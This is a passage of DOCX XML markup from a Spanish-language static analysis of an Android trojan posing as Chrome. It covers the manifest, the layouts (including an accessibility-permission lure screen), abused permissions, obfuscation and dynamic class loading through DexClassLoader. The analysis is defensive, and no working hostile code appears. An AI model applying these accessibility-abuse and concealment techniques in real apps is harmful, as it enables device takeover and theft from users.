        <w:t xml:space="preserve">También se puede observar la etiqueta utilizada para la aplicación, declarada en el manifiesto bajo la propiedad </w:t>
      </w:r>
      <w:r w:rsidRPr="00631F78">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>android:label</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, con el valor </w:t>
      </w:r>
      <w:r w:rsidRPr="00631F78">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>@string/app_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Este valor no es una cadena directa, sino un recurso almacenado en </w:t>
      </w:r>
      <w:r w:rsidRPr="00631F78">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>/res/values/strings.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Si buscamos en los recursos mencionados, obtenemos el valor de </w:t>
      </w:r>
      <w:r w:rsidRPr="00631F78">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>app_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, que es “Chrome”</w:t>
      </w:r>
      <w:r w:rsidR="00901A5B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, lo cual se ajusta a los datos recabados por el momento acerca de la aplicación troyano.</w:t>
      </w:r>
      <w:r w:rsidR="00EE2AF7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pese a no encontrarse la actividad principal detallada en el manifiesto en esta versión inicial de las clases, sí que se encuentra la disposición o layout de la actividad, es decir, la interfaz de usuario que tendrá esta primera pantalla de la aplicación. El recurso asociado es el XML “activity_main”. Los archivos XML pueden ser utilizados en Android para indicar los elementos que componen la interfaz, así como sus detalles asociados. En este caso la interfaz no contiene muchos elementos, y el XML completo es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FFA8C4" w14:textId="77777777" w:rsidR="00EE2AF7" w:rsidRDefault="00EE2AF7" w:rsidP="00050E15">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="361BBE6F" w14:textId="77777777" w:rsidR="00EE2AF7" w:rsidRDefault="00EE2AF7" w:rsidP="00EE2AF7">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&lt;?xml version="1.0" encoding="utf-8"?&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:app="http://schemas.android.com/apk/res-auto"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    android:id="@+id/activity_main"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    android:layout_width="match_parent"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    android:layout_height="match_parent"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    &lt;WebView</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        android:id="@+id/webview"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        android:layout_width="match_parent"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        android:layout_height="match_parent"/&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;/RelativeLayout&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414B5683" w14:textId="77777777" w:rsidR="00EE2AF7" w:rsidRDefault="00EE2AF7" w:rsidP="00050E15">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F94F9B6" w14:textId="134A3568" w:rsidR="00EE2AF7" w:rsidRDefault="00EE2AF7" w:rsidP="00050E15">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Se trata de una pantalla que tiene una disposición relativa de los elementos, lo que significa que los elementos son posicionados relativos a otros en el mismo rango de la jerarquía o elementos hermanos. El único elemento en la disposición es WebView, que sirve para mostrar páginas web dentro de las aplicaciones [X]. Nuevamente se observa que el código analizado hasta el momento encajaría con la naturaleza esperada de la aplicación, ya que el servicio que el malware trata de suplantar se trata de un navegador web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4B6A1C" w14:textId="7E733E6D" w:rsidR="007C542A" w:rsidRDefault="003A2B3F" w:rsidP="00050E15">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Observamos el resto de disposiciones encontradas en </w:t>
      </w:r>
      <w:r w:rsidRPr="007C542A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
        </w:rPr>
        <w:t>/res/layout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> e identificamos algunas que pueden aportar información</w:t>
      </w:r>
      <w:r w:rsidR="007C542A">
        <w:t xml:space="preserve"> a partir de los datos presentes en su XML, además de poder obtener previsualizaciones de la colocación si cargamos el XML directamente en Android Studio, sin necesidad de estar asociado a un proyecto. </w:t>
      </w:r>
      <w:r w:rsidR="00C54904">
        <w:t xml:space="preserve">En algunos de estos casos los recursos se cargan de manera dinámica, con lo que solamente están disponibles algunos de los valores de las cadenas, pero no los iconos o imágenes adicionales. </w:t>
      </w:r>
      <w:r w:rsidR="007C542A">
        <w:t>Las disposiciones consideradas de interés</w:t>
      </w:r>
      <w:r w:rsidR="00546638">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C542A">
        <w:t>son las siguientes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B5CF6D" w14:textId="711C0055" w:rsidR="007C56DD" w:rsidRDefault="007C542A" w:rsidP="00050E15">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="005B4C31">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
        </w:rPr>
        <w:t>layout_accessibility_restriction.xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00B43F49">
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00546638">
        <w:t xml:space="preserve">antalla de interfaz de aplicación dedicada a la obtención de los permisos de accesibilidad. Cuenta con la serie de pasos a </w:t>
      </w:r>
      <w:r w:rsidR="00546638">
        <w:lastRenderedPageBreak/>
        <w:t>seguir por parte del usuario para activar la opción en los ajustes del dispositivo,</w:t>
      </w:r>
      <w:r w:rsidR="00C54904">
        <w:t xml:space="preserve"> bajo la premisa de “</w:t>
      </w:r>
      <w:r w:rsidR="00C54904" w:rsidRPr="00B5728D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
        </w:rPr>
        <w:t>Enable permission to protect your phone</w:t>
      </w:r>
      <w:r w:rsidR="00C54904">
        <w:t>”.</w:t>
      </w:r>
      <w:r w:rsidR="00546638">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E59091" w14:textId="0586A0D0" w:rsidR="005041A5" w:rsidRDefault="007C542A" w:rsidP="00050E15">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="005B4C31">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
        </w:rPr>
        <w:t>splash_screen.xml</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00B43F49">
        <w:t xml:space="preserve"> esta pantalla parece no formar parte de la interfaz estándar de la aplicación, ya que no parece estar relacionada con Google Chrome ni las funciones que supuestamente proporcionará el malware. </w:t>
      </w:r>
      <w:r w:rsidR="000F25E1">
        <w:t>Posee numerosas referencias a una aplicación que llama “</w:t>
      </w:r>
      <w:r w:rsidR="000F25E1" w:rsidRPr="00CB28DC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
        </w:rPr>
        <w:t>FitTrack: Your Personal Fitness Companion</w:t>
      </w:r>
      <w:r w:rsidR="000F25E1">
        <w:t>”, y que no se encuentra referenciada en ningún otro punto del proyecto. También posee un conjunto de imágenes cargadas dinámicamente</w:t>
      </w:r>
      <w:r w:rsidR="00A25CDE">
        <w:t xml:space="preserve">, como un </w:t>
      </w:r>
      <w:r w:rsidR="000F25E1">
        <w:t xml:space="preserve"> y una subsección relativa nuevamente a la petición de permisos, ya que contiene el texto “</w:t>
      </w:r>
      <w:r w:rsidR="000F25E1" w:rsidRPr="00B5728D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
        </w:rPr>
        <w:t>To make the most of FitTrack, please grant the necessary permissions when prompted</w:t>
      </w:r>
      <w:r w:rsidR="000F25E1">
        <w:t>”. Es posible que se trate de otra aplicación que el malware suplante en otra versión diferente, ya que se ha encontrado una aplicación FitTrack en la Play Store con funciones como las descritas en el XML encontrado</w:t>
      </w:r>
      <w:r w:rsidR="00FF1495">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A25CDE">
        <w:t xml:space="preserve">acerca de seguimiento de actividades deportivas y programas de entrenamiento </w:t>
      </w:r>
      <w:r w:rsidR="00FF1495">
        <w:t>[X]</w:t>
      </w:r>
      <w:r w:rsidR="000F25E1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A64DFD" w14:textId="247B3993" w:rsidR="00C54904" w:rsidRPr="00EE2AF7" w:rsidRDefault="00DA565D" w:rsidP="00B43F49">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="005B4C31">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
        </w:rPr>
        <w:t>activity_dashboard.xml</w:t>
      </w:r>
      <w:r w:rsidR="00C54904">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00B43F49">
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00C54904">
        <w:t>antalla que parece dedicada a casos de falta de conexión por parte de la aplicación. El layout es relativamente simple se ha nombrado “</w:t>
      </w:r>
      <w:r w:rsidR="00C54904" w:rsidRPr="00547151">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
        </w:rPr>
        <w:t>no_internet_layout</w:t>
      </w:r>
      <w:r w:rsidR="00C54904">
        <w:t>”. Se compone de una imagen cargada dinámicamente y el texto “No Connection” en el centro de la interfaz.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0100D7" w14:textId="77777777" w:rsidR="00EE2AF7" w:rsidRPr="00EE2AF7" w:rsidRDefault="00EE2AF7" w:rsidP="00050E15">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A37D3FB" w14:textId="5CD7560F" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00050E15">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Por último, el manifiesto también arroja información sobre las intenciones de la aplicación respecto a los permisos de accesibilidad y la API de administración de servicios entre otros.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACC2D9B" w14:textId="3324F4FF" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00050E15">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Para tener acceso a estas funciones, la aplicación declara en el manifiesto una serie de servicios y receptores. Los servicios son los siguientes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FE82F3"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683B24">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>BIND_ACCESSIBILITY_SERVICE.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Este permiso permite la recepción y emisión de eventos de accesibilidad del sistema [X]. Este tipo de eventos va desde acciones de clic en la pantalla, deslizamiento o clic en los botones de navegación del sistema. A través de este permiso se puede tener una perspectiva general de qué acciones se realizan por parte del usuario, además de poder realizar de manera automática las acciones deseadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF296D7"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BIND_NOTIFICATION_LISTENER_SERVICE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> [X]. En este caso el permiso proporciona en forma de eventos todas las notificaciones que se producen en el sis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>tema Android, además de la reacción de los usuarios a estas (cancelaciones de la notificación, notificaciones descartadas por tiempo de espera excesivo…).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4891ABE4" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00050E15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Un servicio de enlace con el permiso </w:t>
      </w:r>
      <w:r w:rsidRPr="004E54A8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SEND_RESPOND_VIA_MESSAGE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, que permite a una aplicación responder a una llamada a través de un mensaje. De acuerdo con la documentación de Android, este permiso no debería ser solicitado por aplicaciones de terceros, estando reservado para aplicaciones del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177C385A" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRPr="0062579F" w:rsidRDefault="00337CE1" w:rsidP="00050E15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Una serie de servicios que están asociados con el permiso </w:t>
      </w:r>
      <w:r w:rsidRPr="00683B24">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>BIND_JOB_SERVICE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, utilizado para la gestión de peticiones asíncronas. Todos estos servicios tienen seleccionado como proceso a “</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB1C52">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:acra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>”. ACRA es un conocido sistema de informe de fallos (más conocido como crash reporting) de código libre, utilizado en una gran cantidad de aplicaciones Android [X]. Este conjunto de servicios podría indicar la intención de la aplicación de llevar a cabo peticiones con información de fallos en el caso de producirse problemas de ejecución del malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138A851A" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRPr="005D5EEE" w:rsidRDefault="00337CE1" w:rsidP="00050E15">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Como último dato relevante del manifiesto, podemos observar datos adicionales relativos a la compilación de la aplicación, ya que la versión mínima del SDK Android que soporta es la </w:t>
      </w:r>
      <w:r w:rsidRPr="005D5EEE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, que hace referencia a Android 5.1 (conocido como Lollipop), mientras que la versión SDK objetivo para la que se ha desarrollado la aplicación es la 26, que se trata de Android 8.0 (conocido como Oreo).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4420F6F5" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00050E15">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FAEFDE7" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00050E15">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Una vez extraída esta información a partir del manifiesto XML, podemos pasar al resto de archivos resultantes del desempaquetado del archivo APK. Un archivo clave será el ejecutable DEX mencionado previamente, que contiene información acerca de las clases iniciales que componen la aplicación, y a partir del cual podemos tratar de obtener código en formato Java. Para ello utilizaremos la herramienta JADX en su versión con interfaz gráfica de usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374F6C26" w14:textId="5798BCB2" w:rsidR="00337CE1" w:rsidRDefault="000C1FC5" w:rsidP="00050E15">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="4A7DE4A5">
          <v:shape id="_x0000_s2069" type="#_x0000_t75" alt="A black text on a white background&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:117.45pt;width:439.35pt;height:160.55pt;z-index:18;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4" o:title="A black text on a white background&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00337CE1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Una vez JADX descompila el DEX a código Java, podemos navegar por las clases encontradas como si fuese un proyecto Android estándar</w:t>
      </w:r>
      <w:r w:rsidR="00E32F95">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> desarrollado con Java, pese a que en algunos casos la ofuscación u operaciones complejas pueden no ser interpretadas totalmen</w:t>
      </w:r>
      <w:r w:rsidR="00E32F95">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>te de manera correcta por parte de JADX, en cuyo caso indica el código Dalvik inicial</w:t>
      </w:r>
      <w:r w:rsidR="00337CE1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF4B07D" w14:textId="3AD46E7D" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52239E93" w14:textId="71D066F4" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00050E15">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Sin embargo, </w:t>
      </w:r>
      <w:r w:rsidR="006E344B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">para este caso </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>parece que todo el código de los subpaquetes de com.busy se encuentra ofuscado, con nombres de métodos que no son relevantes y código deliberadamente complejo para tratar de esconder su funcionamiento. Además, no está presente la clase de la actividad inicial registrada en el manifiesto XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B874E49" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="000C1FC5" w:rsidP="00337CE1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="6471121D">
          <v:shape id="_x0000_s2068" type="#_x0000_t75" alt="A screenshot of a computer code&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="position:absolute;margin-left:0;margin-top:19.8pt;width:439.35pt;height:245.9pt;z-index:19;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45" o:title="A screenshot of a computer code&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D31B0A" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54BB794F" w14:textId="77777777" w:rsidR="00E344A8" w:rsidRDefault="00337CE1" w:rsidP="00050E15">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Por lo tanto, debemos asumir que la aplicación ha sido ofuscada y que posiblemente realice carga dinámica de clases para evitar que estas sean analizadas de manera sencilla. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC12446" w14:textId="328934CD" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00050E15">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Respecto a la ofuscación, ya que </w:t>
      </w:r>
      <w:r w:rsidR="00924E4E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>APKiD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> no ha detectado ningún método de los más comunes como ProGuard o DexGuard, no poseemos mecanismos automáticos para tratar de revertir el proceso, por lo tanto, se procederá a investigar si se realiza una carga dinámica de clases. En el caso de realizarse, Android utiliza la clase DexClassLoader [X] para la carga adicional desde un archivo JAR o APK. Encontramos la creación de un objeto DexClassLoader en la clase “</w:t>
      </w:r>
      <w:r w:rsidRPr="00A2296B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>YRoEyIoHcCt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">” mostrada anteriormente. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059982E0" w14:textId="71C2A9B9" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00050E15">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">En este caso, la pila de llamadas es excesivamente compleja e incluye multitud de operaciones intermedias, con lo que impide averiguar el primer argumento pasado al constructor de DexClassLoader, que es el directorio del archivo DEX que utilizará para cargar las nuevas clases. </w:t>
      </w:r>
      <w:r w:rsidR="002F25E7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Por lo tanto, no se puede determinar fácilmente el nombre del archivo DEX que se utiliza, y procedemos a continuar con el proceso de análisis para tratar de recopilar más información que sea de utilidad. </w:t>
      </w:r>
    </w:p>
